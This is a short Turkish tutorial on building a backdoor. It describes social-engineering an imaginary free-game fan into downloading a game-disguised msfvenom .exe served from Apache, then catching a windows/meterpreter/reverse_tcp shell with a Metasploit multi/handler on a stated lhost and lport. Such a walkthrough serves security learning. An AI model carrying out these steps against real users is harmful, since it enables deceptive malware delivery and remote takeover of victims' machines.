Arka Kapı(Backdoor) Oluşturma

Arka Kapı

Arka kapı kısaca hedef kullanıcı makineye erişimi sağlayabileceğimiz onun henüz bilmediği farklı bir giriş noktasıdır.Aşağıda kısaca sosyal mühendislik kısmıyla oluşturulması ve aktifleştirlmesi anlatılmıştır.

Sosyal Mühendislik

Bilgisayarımıza indirdiğimiz ücretsiz ama güvenliğin tehlikeli saydığı o dosyamız acaba nelere yol açtı?

Bu soruyla yola çıktık ve bir arka kapının hikayesini yazdık.

Sosyal mühendislik ile bu yolculuğa başlıyoruz. Ayrıntılı bilgi bu sosyal mühendislik bağlantısındadır. Hayali kullanıcı hakkında araştırma yapıldı ve ücretsiz oyun bağımlısı olduğu öğrenildi. Şimdiki adımımızda güvenli bir eposta ile ona oluşturduğumuz oyun görünümlü arka kapıyı indirteceğiz.

Arka Kapıyı Oluşturma

Kullanıcının indireceği arka kapıyı msfvenom ile oluşturacağız. Ayrıntılı bilgi için msfvenom sitesine göz atabilirsiniz. Öncesinde uzaktan bağlantı ve dosya indirmede kolaylık sağlamak için

service apache2 start

sunucumu aktif hale getiriyoruz.

-p : payload'ın kısaltmasıdır. Arka kapı açmamız için gerekli kodları barındırır.

-o : --out anlamında. Karşı tarafa gönderilecek olan dosyayı oluşturmamızı sağlar.

-f : --format karşılığıdır. Çıktı dosyamızın türünü belirtiriz. Örneğimizde .exe çıktı dosya formatımızdır.

/var/www/html : Dışarıdan ulaşılabilecek bir dosya yolunu verdik.

Arka kapı hazırlıklarını yapıp zararlıyı postaladıktan sonra kullanıcının arka kapıyı açmasını beklemek için hazırlıklarımız yapıyoruz. msfvenom ile Metasploit hazır hale gelmeli. Ardından

use exploit/multi/handler

kodunu çalıştırıyoruz. Çalıştırmamız gereken payload için hazır hale gelmemizde faydası vardır. Sırasıyla aşağıdaki yapılandırmaları yapıp karşını cevabını bekliyoruz.

set payload windows/meterpreter/reverse_tcp

set lhost 10.10.14.223

set lport 12345

exploit

Karşıdan cevap gelince meterpreter konsolu aktifleşiyor. Ve arka kapı açma işlemi başarıyla tamamlanmış oluyor.